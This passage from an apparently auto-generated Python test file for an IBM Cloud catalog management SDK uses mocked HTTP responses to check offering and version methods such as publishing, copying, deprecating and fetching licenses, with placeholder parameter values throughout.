Test Class for replace_offering_icon
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_replace_offering_icon_all_params(self):
"""
replace_offering_icon()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/icon/testString')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
offering_id = 'testString'
file_name = 'testString'
# Invoke method
response = _service.replace_offering_icon(
catalog_identifier,
offering_id,
file_name,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_replace_offering_icon_value_error(self):
"""
test_replace_offering_icon_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/icon/testString')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
offering_id = 'testString'
file_name = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
"offering_id": offering_id,
"file_name": file_name,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.replace_offering_icon(**req_copy)
class TestUpdateOfferingIbm():
"""
Test Class for update_offering_ibm
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_update_offering_ibm_all_params(self):
"""
update_offering_ibm()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/publish/allow_request/true')
mock_response = '{"allow_request": false, "ibm": false, "public": true, "changed": false}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
offering_id = 'testString'
approval_type = 'allow_request'
approved = 'true'
# Invoke method
response = _service.update_offering_ibm(
catalog_identifier,
offering_id,
approval_type,
approved,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_update_offering_ibm_value_error(self):
"""
test_update_offering_ibm_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/publish/allow_request/true')
mock_response = '{"allow_request": false, "ibm": false, "public": true, "changed": false}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
offering_id = 'testString'
approval_type = 'allow_request'
approved = 'true'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
"offering_id": offering_id,
"approval_type": approval_type,
"approved": approved,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.update_offering_ibm(**req_copy)
class TestGetOfferingUpdates():
"""
Test Class for get_offering_updates
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_get_offering_updates_all_params(self):
"""
get_offering_updates()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/updates')
mock_response = '[{"version_locator": "version_locator", "version": "version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "package_version": "package_version", "can_update": true, "messages": {"mapKey": "inner"}}]'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
offering_id = 'testString'
kind = 'testString'
version = 'testString'
cluster_id = 'testString'
region = 'testString'
resource_group_id = 'testString'
namespace = 'testString'
# Invoke method
response = _service.get_offering_updates(
catalog_identifier,
offering_id,
kind,
version=version,
cluster_id=cluster_id,
region=region,
resource_group_id=resource_group_id,
namespace=namespace,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate query params
query_string = responses.calls[0].request.url.split('?',1)[1]
query_string = urllib.parse.unquote_plus(query_string)
assert 'kind={}'.format(kind) in query_string
assert 'version={}'.format(version) in query_string
assert 'cluster_id={}'.format(cluster_id) in query_string
assert 'region={}'.format(region) in query_string
assert 'resource_group_id={}'.format(resource_group_id) in query_string
assert 'namespace={}'.format(namespace) in query_string
@responses.activate
def test_get_offering_updates_required_params(self):
"""
test_get_offering_updates_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/updates')
mock_response = '[{"version_locator": "version_locator", "version": "version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "package_version": "package_version", "can_update": true, "messages": {"mapKey": "inner"}}]'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
offering_id = 'testString'
kind = 'testString'
# Invoke method
response = _service.get_offering_updates(
catalog_identifier,
offering_id,
kind,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate query params
query_string = responses.calls[0].request.url.split('?',1)[1]
query_string = urllib.parse.unquote_plus(query_string)
assert 'kind={}'.format(kind) in query_string
@responses.activate
def test_get_offering_updates_value_error(self):
"""
test_get_offering_updates_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/updates')
mock_response = '[{"version_locator": "version_locator", "version": "version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "package_version": "package_version", "can_update": true, "messages": {"mapKey": "inner"}}]'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
offering_id = 'testString'
kind = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
"offering_id": offering_id,
"kind": kind,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.get_offering_updates(**req_copy)
# endregion
##############################################################################
# End of Service: Offerings
##############################################################################
##############################################################################
# Start of Service: Versions
##############################################################################
# region
class TestGetOfferingAbout():
"""
Test Class for get_offering_about
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_get_offering_about_all_params(self):
"""
get_offering_about()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/about')
mock_response = '"operation_response"'
responses.add(responses.GET,
url,
body=mock_response,
content_type='text/markdown',
status=200)
# Set up parameter values
version_loc_id = 'testString'
# Invoke method
response = _service.get_offering_about(
version_loc_id,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_get_offering_about_value_error(self):
"""
test_get_offering_about_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/about')
mock_response = '"operation_response"'
responses.add(responses.GET,
url,
body=mock_response,
content_type='text/markdown',
status=200)
# Set up parameter values
version_loc_id = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"version_loc_id": version_loc_id,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.get_offering_about(**req_copy)
class TestGetOfferingLicense():
"""
Test Class for get_offering_license
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_get_offering_license_all_params(self):
"""
get_offering_license()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/licenses/testString')
mock_response = '"operation_response"'
responses.add(responses.GET,
url,
body=mock_response,
content_type='text/plain',
status=200)
# Set up parameter values
version_loc_id = 'testString'
license_id = 'testString'
# Invoke method
response = _service.get_offering_license(
version_loc_id,
license_id,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_get_offering_license_value_error(self):
"""
test_get_offering_license_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/licenses/testString')
mock_response = '"operation_response"'
responses.add(responses.GET,
url,
body=mock_response,
content_type='text/plain',
status=200)
# Set up parameter values
version_loc_id = 'testString'
license_id = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"version_loc_id": version_loc_id,
"license_id": license_id,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.get_offering_license(**req_copy)
class TestGetOfferingContainerImages():
"""
Test Class for get_offering_container_images
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_get_offering_container_images_all_params(self):
"""
get_offering_container_images()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/containerImages')
mock_response = '{"description": "description", "images": [{"image": "image"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
version_loc_id = 'testString'
# Invoke method
response = _service.get_offering_container_images(
version_loc_id,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_get_offering_container_images_value_error(self):
"""
test_get_offering_container_images_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/containerImages')
mock_response = '{"description": "description", "images": [{"image": "image"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
version_loc_id = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"version_loc_id": version_loc_id,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.get_offering_container_images(**req_copy)
class TestDeprecateVersion():
"""
Test Class for deprecate_version
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_deprecate_version_all_params(self):
"""
deprecate_version()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/deprecate')
responses.add(responses.POST,
url,
status=202)
# Set up parameter values
version_loc_id = 'testString'
# Invoke method
response = _service.deprecate_version(
version_loc_id,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 202
@responses.activate
def test_deprecate_version_value_error(self):
"""
test_deprecate_version_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/deprecate')
responses.add(responses.POST,
url,
status=202)
# Set up parameter values
version_loc_id = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"version_loc_id": version_loc_id,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.deprecate_version(**req_copy)
class TestAccountPublishVersion():
"""
Test Class for account_publish_version
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_account_publish_version_all_params(self):
"""
account_publish_version()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/account-publish')
responses.add(responses.POST,
url,
status=202)
# Set up parameter values
version_loc_id = 'testString'
# Invoke method
response = _service.account_publish_version(
version_loc_id,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 202
@responses.activate
def test_account_publish_version_value_error(self):
"""
test_account_publish_version_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/account-publish')
responses.add(responses.POST,
url,
status=202)
# Set up parameter values
version_loc_id = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"version_loc_id": version_loc_id,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.account_publish_version(**req_copy)
class TestIbmPublishVersion():
"""
Test Class for ibm_publish_version
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_ibm_publish_version_all_params(self):
"""
ibm_publish_version()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/ibm-publish')
responses.add(responses.POST,
url,
status=202)
# Set up parameter values
version_loc_id = 'testString'
# Invoke method
response = _service.ibm_publish_version(
version_loc_id,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 202
@responses.activate
def test_ibm_publish_version_value_error(self):
"""
test_ibm_publish_version_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/ibm-publish')
responses.add(responses.POST,
url,
status=202)
# Set up parameter values
version_loc_id = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"version_loc_id": version_loc_id,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.ibm_publish_version(**req_copy)
class TestPublicPublishVersion():
"""
Test Class for public_publish_version
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_public_publish_version_all_params(self):
"""
public_publish_version()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/public-publish')
responses.add(responses.POST,
url,
status=202)
# Set up parameter values
version_loc_id = 'testString'
# Invoke method
response = _service.public_publish_version(
version_loc_id,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 202
@responses.activate
def test_public_publish_version_value_error(self):
"""
test_public_publish_version_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/public-publish')
responses.add(responses.POST,
url,
status=202)
# Set up parameter values
version_loc_id = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"version_loc_id": version_loc_id,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.public_publish_version(**req_copy)
class TestCommitVersion():
"""
Test Class for commit_version
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_commit_version_all_params(self):
"""
commit_version()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/commit')
responses.add(responses.POST,
url,
status=200)
# Set up parameter values
version_loc_id = 'testString'
# Invoke method
response = _service.commit_version(
version_loc_id,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_commit_version_value_error(self):
"""
test_commit_version_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/commit')
responses.add(responses.POST,
url,
status=200)
# Set up parameter values
version_loc_id = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"version_loc_id": version_loc_id,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.commit_version(**req_copy)
class TestCopyVersion():
"""
Test Class for copy_version
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_copy_version_all_params(self):
"""
copy_version()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/copy')
responses.add(responses.POST,
url,
status=200)
# Set up parameter values
version_loc_id = 'testString'
tags = ['testString']
target_kinds = ['testString']
content = b'This is a mock byte array value.'
# Invoke method
response = _service.copy_version(
version_loc_id,
tags=tags,
target_kinds=target_kinds,
content=content,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['tags'] == ['testString']
assert req_body['target_kinds'] == ['testString']
assert req_body['content'] == 'VGhpcyBpcyBhIG1vY2sgYnl0ZSBhcnJheSB2YWx1ZS4='
@responses.activate
def test_copy_version_required_params(self):
"""
test_copy_version_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/copy')
responses.add(responses.POST,
url,
status=200)
# Set up parameter values
version_loc_id = 'testString'
# Invoke method
response = _service.copy_version(
version_loc_id,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_copy_version_value_error(self):
"""
test_copy_version_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/copy')
responses.add(responses.POST,
url,
status=200)
# Set up parameter values
version_loc_id = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"version_loc_id": version_loc_id,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.copy_version(**req_copy)
class TestGetOfferingWorkingCopy():
"""
Test Class for get_offering_working_copy
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_get_offering_working_copy_all_params(self):
"""
get_offering_working_copy()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/workingcopy')
mock_response = '{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
version_loc_id = 'testString'
# Invoke method
response = _service.get_offering_working_copy(
version_loc_id,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_get_offering_working_copy_value_error(self):
"""
test_get_offering_working_copy_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/workingcopy')
mock_response = '{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
version_loc_id = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"version_loc_id": version_loc_id,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.get_offering_working_copy(**req_copy)
class TestGetVersion():
"""
Test Class for get_version
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_get_version_all_params(self):
"""
get_version()
"""
# Set up mock
